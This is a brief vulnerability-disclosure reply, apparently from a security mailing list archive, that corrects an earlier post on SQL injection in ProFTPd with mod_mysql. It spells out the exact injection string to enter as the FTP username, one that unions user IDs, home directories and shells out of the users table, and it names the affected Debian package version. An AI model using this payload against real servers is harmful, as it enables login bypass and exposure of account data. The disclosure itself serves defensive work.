Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21340
HistoryFeb 12, 2009 - 12:00 a.m.

Re: Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

2009-02-1200:00:00
vulners.com
31

Uh-oh, sorry, bad copy-paste…the user is just

%') and 1=2 union select 1,1,uid,gid,homedir,shell from users; –

not

USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users; –

I am using debian packaged proftpd 1.3.1-16 if that matters.